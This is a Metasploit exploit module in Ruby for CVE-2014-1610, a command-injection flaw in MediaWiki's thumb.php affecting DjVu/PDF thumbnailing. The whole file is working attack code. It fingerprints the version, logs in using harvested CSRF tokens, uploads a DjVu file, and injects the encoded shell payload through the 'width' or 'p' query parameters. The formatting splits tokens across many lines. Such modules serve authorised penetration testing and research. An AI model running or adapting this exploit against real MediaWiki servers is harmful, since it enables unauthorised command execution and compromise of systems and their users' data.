##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'MediaWiki Thumb.php Remote Command Execution'
,
'Description'
=> %q{
MediaWiki
1
.
22
.x before
1
.
22
.
2
,
1
.
21
.x before
1
.
21
.
5
and
1
.
19
.x before
1
.
19
.
11
,
when
DjVu
or
PDF
file upload support is enabled, allows remote unauthenticated
users to execute arbitrary commands via shell metacharacters. If no target file
is specified this
module
will attempt to log
in
with the provided credentials to
upload a file (.DjVu) to use
for
exploitation.
},
'Author'
=>
[
'Netanel Rubin'
,
# from Check Point - Discovery
'Brandon Perry'
,
# Metasploit Module
'Ben Harris'
,
# Metasploit Module
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
# Metasploit Module
],
'License'
=>
MSF_LICENSE
,
'References'
=>
[
[
'CVE'
,
'2014-1610'
],
[
'OSVDB'
,
'102630'
],
[
'URL'
,
'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html'
],
[
'URL'
,
'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339'
]
],
'Privileged'
=>
false
,
'Targets'
=>
[
[
'Automatic PHP-CLI'
,
{
'Payload'
=>
{
'BadChars'
=>
"\r\n"
,
'PrependEncoder'
=>
"php -r \""
,
'AppendEncoder'
=>
"\""
},
'Platform'
=> [
'php'
],
'Arch'
=>
ARCH_PHP
}
],
[
'Linux CMD'
,
{
'Payload'
=>
{
'BadChars'
=>
""
,
'Compat'
=>
{
'PayloadType'
=>
'cmd'
,
'RequiredCmd'
=>
'generic perl python php'
,
}
},
'Platform'
=> [
'unix'
],
'Arch'
=>
ARCH_CMD
}
],
[
'Windows CMD'
,
{
'Payload'
=>
{
'BadChars'
=>
""
,
'Compat'
=>
{
'PayloadType'
=>
'cmd'
,
'RequiredCmd'
=>
'generic perl'
,
}
},
'Platform'
=> [
'win'
],
'Arch'
=>
ARCH_CMD
}
]
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Jan 28 2014'
))
register_options(
[
OptString.
new
(
'TARGETURI'
, [
true
,
"Base MediaWiki path"
,
'/mediawiki'
]),
OptString.
new
(
'FILENAME'
, [
false
,
"Target DjVu/PDF file (e.g target.djvu target.pdf)"
,
nil
]),
OptString.
new
(
'USERNAME'
, [
false
,
"Username to authenticate with"
,
''
]),
OptString.
new
(
'PASSWORD'
, [
false
,
"Password to authenticate with"
,
''
])
],
self
.
class
)
end
def
get_version(body)
meta_generator = get_html_value(body,
'meta'
,
'generator'
,
'content'
)
unless
meta_generator
vprint_status(
"No META Generator tag on #{full_uri}."
)
return
nil
,
nil
,
nil
end
if
meta_generator && meta_generator =~ /mediawiki/i
vprint_status(
"#{meta_generator} detected."
)
meta_generator =~ /(\d)\.(\d+)[\.
A
-z]+(\d+)/
major =
$1
.to_i
minor =
$2
.to_i
patch =
$3
.to_i
vprint_status(
"Major:#{major} Minor:#{minor} Patch:#{patch}"
)
return
major, minor, patch
end
return
nil
,
nil
,
nil
end
def
check
uri = target_uri.path
opts = {
'uri'
=> normalize_uri(uri,
'index.php'
) }
response = send_request_cgi!(opts)
if
opts[
'redirect_uri'
]
vprint_status(
"Redirected to #{opts['redirect_uri']}."
)
end
unless
response
vprint_status(
"No response from #{full_uri}."
)
return
CheckCode::Unknown
end
# Mediawiki will give a 404 for unknown pages but still have a body
if
response.code ==
200
|| response.code ==
404
vprint_status(
"#{response.code} response received..."
)
major, minor, patch = get_version(response.body)
unless
major
return
CheckCode::Unknown
end
if
major ==
1
&& (minor <
8
|| minor >
22
)
return
CheckCode::Safe
elsif
major ==
1
&& (minor ==
22
&& patch >
1
)
return
CheckCode::Safe
elsif
major ==
1
&& (minor ==
21
&& patch >
4
)
return
CheckCode::Safe
elsif
major ==
1
&& (minor ==
19
&& patch >
10
)
return
CheckCode::Safe
elsif
major ==
1
return
CheckCode::Appears
else
return
CheckCode::Safe
end
end
vprint_status(
"Received response code #{response.code} from #{full_uri}"
)
CheckCode::Unknown
end
def
exploit
uri = target_uri.path
print_status(
"Grabbing version and login CSRF token..."
)
response = send_request_cgi({
'uri'
=> normalize_uri(uri,
'index.php'
),
'vars_get'
=> {
'title'
=>
'Special:UserLogin'
}
})
unless
response
fail_with(Failure::NotFound,
"Failed to retrieve webpage."
)
end
server = response[
'Server'
]
if
server && target.name =~ /automatic/i && server =~ /win32/i
vprint_status(
"Windows platform detected: #{server}."
)
my_platform = Msf::
Module
::Platform::Windows
elsif
server && target.name =~ /automatic/i
vprint_status(
"Nix platform detected: #{server}."
)
my_platform = Msf::
Module
::Platform::Unix
else
my_platform = target.platform.platforms.first
end
# If we have already identified a DjVu/PDF file on the server trigger
# the exploit
unless
datastore[
'FILENAME'
].blank?
payload_request(uri, datastore[
'FILENAME'
], my_platform)
return
end
username = datastore[
'USERNAME'
]
password = datastore[
'PASSWORD'
]
major, minor, patch = get_version(response.body)
# Upload CSRF added in v1.18.2
# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1
if
((major ==
1
) && (minor ==
18
) && (patch ==
0
|| patch ==
1
))
upload_csrf =
false
elsif
((major ==
1
) && (minor <
18
))
upload_csrf =
false
else
upload_csrf =
true
end
session_cookie = response.get_cookies
wp_login_token = get_html_value(response.body,
'input'
,
'wpLoginToken'
,
'value'
)
if
wp_login_token.blank?
fail_with(Failure::UnexpectedReply,
"Couldn't find login token. Is URI set correctly?"
)
else
print_good(
"Retrieved login CSRF token."
)
end
print_status(
"Attempting to login..."
)
login = send_request_cgi({
'uri'
=> normalize_uri(uri,
'index.php'
),
'method'
=>
'POST'
,
'vars_get'
=> {
'title'
=>
'Special:UserLogin'
,
'action'
=>
'submitlogin'
,
'type'
=>
'login'
},
'cookie'
=> session_cookie,
'vars_post'
=> {
'wpName'
=> username,
'wpPassword'
=> password,
'wpLoginAttempt'
=>
'Log in'
,
'wpLoginToken'
=> wp_login_token
}
})
if
login
and
login.code ==
302
print_good(
"Log in successful."
)
else
fail_with(Failure::NoAccess,
"Failed to log in."
)
end
auth_cookie = login.get_cookies.gsub(
'mediawikiToken=deleted;'
,
''
)
# Testing v1.15.1 it looks like it has session fixation
# vulnerability so we dont get a new session cookie after
# authenticating. Therefore we need to include our old cookie.
unless
auth_cookie.include?
'session='
auth_cookie << session_cookie
end
print_status(
"Getting upload CSRF token..."
)
if
upload_csrf
upload_file = send_request_cgi({
'uri'
=> normalize_uri(uri,
'index.php'
,
'Special:Upload'
),
'cookie'
=> auth_cookie
})
unless
upload_file
and
upload_file.code ==
200
fail_with(Failure::NotFound,
"Failed to access file upload page."
)
end
wp_edit_token = get_html_value(upload_file.body,
'input'
,
'wpEditToken'
,
'value'
)
if
upload_csrf
wp_upload = get_html_value(upload_file.body,
'input'
,
'wpUpload'
,
'value'
)
title = get_html_value(upload_file.body,
'input'
,
'title'
,
'value'
)
if
upload_csrf && wp_edit_token.blank?
fail_with(Failure::UnexpectedReply,
"Couldn't find upload token. Is URI set correctly?"
)
elsif
upload_csrf
print_good(
"Retrieved upload CSRF token."
)
end
upload_mime = Rex::
MIME
::Message.
new
djvu_file = ::
File
.read(::
File
.join(Msf::Config.data_directory,
"exploits"
,
"cve-2014-1610"
,
"metasploit.djvu"
))
file_name =
"#{rand_text_alpha(4)}.djvu"
upload_mime.add_part(djvu_file,
"application/octet-stream"
,
"binary"
,
"form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\""
)
upload_mime.add_part(
"#{file_name}"
,
nil
,
nil
,
"form-data; name=\"wpDestFile\""
)
upload_mime.add_part(
"#{rand_text_alpha(4)}"
,
nil
,
nil
,
"form-data; name=\"wpUploadDescription\""
)
upload_mime.add_part(
""
,
nil
,
nil
,
"form-data; name=\"wpLicense\""
)
upload_mime.add_part(
"1"
,
nil
,
nil
,
"form-data; name=\"wpIgnoreWarning\""
)
upload_mime.add_part(wp_edit_token,
nil
,
nil
,
"form-data; name=\"wpEditToken\""
)
if
upload_csrf
upload_mime.add_part(title,
nil
,
nil
,
"form-data; name=\"title\""
)
upload_mime.add_part(
"1"
,
nil
,
nil
,
"form-data; name=\"wpDestFileWarningAck\""
)
upload_mime.add_part(wp_upload,
nil
,
nil
,
"form-data; name=\"wpUpload\""
)
post_data = upload_mime.to_s
print_status(
"Uploading DjVu file #{file_name}..."
)
upload = send_request_cgi({
'method'
=>
'POST'
,
'uri'
=> normalize_uri(uri,
'index.php'
,
'Special:Upload'
),
'data'
=> post_data,
'ctype'
=>
"multipart/form-data; boundary=#{upload_mime.bound}"
,
'cookie'
=> auth_cookie
})
if
upload
and
upload.code ==
302
and
upload.headers[
'Location'
]
location = upload.headers[
'Location'
]
print_good(
"File uploaded to #{location}"
)
else
if
upload.body.include?
'not a permitted file type'
fail_with(Failure::NotVulnerable,
"Wiki is not configured for target files."
)
else
fail_with(Failure::UnexpectedReply,
"Failed to upload file."
)
end
end
payload_request(uri, file_name, my_platform)
end
def
payload_request(uri, file_name, my_platform)
if
my_platform == Msf::
Module
::Platform::Windows
trigger =
"1)&(#{payload.encoded})&"
else
trigger =
"1;#{payload.encoded};"
end
vars_get = {
'f'
=> file_name }
if
file_name.include?
'.pdf'
vars_get[
'width'
] = trigger
elsif
file_name.include?
'.djvu'
vars_get[
'width'
] =
1
vars_get[
'p'
] = trigger
else
fail_with(Failure::BadConfig,
"Unsupported file extension: #{file_name}"
)
end
print_status(
"Sending payload request..."
)
r = send_request_cgi({
'uri'
=> normalize_uri(uri,
'thumb.php'
),
'vars_get'
=> vars_get
},
1
)
if
r && r.code ==
404
&& r.body =~ /
not
exist/
print_error(
"File: #{file_name} does not exist."
)
elsif
r
print_error(
"Received response #{r.code}, exploit probably failed."
)
end
end
# The order of name, value keeps shifting so regex is painful.
# Cant use nokogiri due to security issues
# Cant use REXML directly as its not strict XHTML
# So we do a filthy mixture of regex and REXML
def
get_html_value(html, type, name, value)
return
nil
unless
html
return
nil
unless
type
return
nil
unless
name
return
nil
unless
value
found =
nil
html.each_line
do
|line|
if
line =~ /(<
#{type}[^\/]*name="#{name}".*?\/>)/i
found = $&
break
end
end
if
found
doc =
REXML
::Document.
new
found
return
doc.root.attributes[value]
end
''
end
end